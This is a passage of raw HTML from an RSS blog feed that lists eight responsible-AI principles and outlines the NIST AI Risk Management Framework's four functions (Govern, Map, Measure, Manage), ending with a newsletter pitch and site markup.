style="font-size:14px;"><ol><ol><li>Privacy,</li><li>Accountability,</li><li>Safety and security,</li><li>Transparency and explainability,</li><li>Fairness and non-discrimination,</li><li>Human control of technology,</li><li>Professional responsibility, and</li><li>Promotion of human values.</li></ol></ol><div><br></div><span style="text-align:justify;"><div>AI presents tremendous opportunity and also high risks. The right risk management approach is critical, as the perils presented by AI differ significantly from previous waves of digital transformation.</div><div><br></div><div>A solid&nbsp;<a href="https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-1.pdf" target="_blank" style="text-align:center;">AI Risk Management Framework</a>&nbsp;enables dialogue, understanding, and activities to manage AI risks, and responsibly develop trustworthy AI systems. It should address four functions:</div></span><ol><ol><li>Govern,</li><li>Map,</li><li>Measure, and</li><li>Manage.</li></ol></ol><span style="text-align:justify;"><div><br></div><div>Each broken down into specific actions and outcomes.</div></span><div><br></div><span style="text-align:justify;"><div>If you enjoyed this article, subscribe so that we can share with you Artificial Intelligence Risk Management approaches and frameworks. We’ll help you identify what you should prioritize now, next, and later.&nbsp;</div></span><div><br></div><span style="text-align:justify;"><div>Stay human!</div></span></span><div><a href="https://www.nownextlater.ai/inesdecastroalmeida.html" target="_blank"></a><a href="https://www.nownextlater.ai/inesdecastroalmeida.html" target="_blank"><span style="font-size:14px;">Inês<br></span></a><br></div></div></div></div></div></div></div></div></div>
</div><div data-element-id="elm_0eEouQoYoybFxb6V7ynsEA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/responsible-ai-in-the-age-of-generative-models-ai-governance-ethics-and-risk-management" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Navy%20and%20Blue%20Modern%20We%20Provide%20Business%20Solutions%20Facebook%20Ad%20-1200%20x%201200%20px-.png" width="500" height="500.00" loading="lazy" size="medium" alt="AI Governance Book"/></picture></a></figure></div>
</div><div class="zpelement zpelem-newsletter " data-list-id="9401000000013922" data-integ-type="1" data-element-id="elm_sCSTPZRyH7iGZouj9-p8Bg" data-element-type="newsletter"><style type="text/css"> [data-element-id="elm_sCSTPZRyH7iGZouj9-p8Bg"].zpelem-newsletter input[type="text"]{ border-radius:1px; } [data-element-id="elm_sCSTPZRyH7iGZouj9-p8Bg"].zpelem-newsletter{ border-radius:1px; } </style><div class="zpnewsletter-container zpnewsletter-style-01 "><h2 class="zpheading zpheading-align-center zpnewsletter-heading" data-editor="true">Subscribe to our newsletter</h2><p class="zptext zptext-align-center zpnewsletter-desc" data-editor="true"> Stay informed about our latest updates through email. Subscribe here.</p><form class="zpform-container zpnewsletter-input-container"><label for="Email_elm_sCSTPZRyH7iGZouj9-p8Bg" class="zs-visually-hidden">Email</label><input type="text" id="Email_elm_sCSTPZRyH7iGZouj9-p8Bg" name="email" placeholder="Email" class="zpnewsletter-email-input-field"/><button type="submit" class="zpbutton zpnewsletter-button zpbutton-type-primary zpbutton-size-md">Subscribe</button></form></div>
</div><div data-element-id="elm_qcACSwF7SeW1KBALMZtFbQ" data-element-type="button" class="zpelement zpelem-button "><style></style><div class="zpbutton-container zpbutton-align-center "><style type="text/css"></style><a class="zpbutton-wrapper zpbutton zpbutton-type-primary zpbutton-size-md " href="javascript:;" target="_blank"><span class="zpbutton-content">Get Started Now</span></a></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Sun, 02 Jul 2023 02:39:36 +1000</pubDate></item></channel></rss>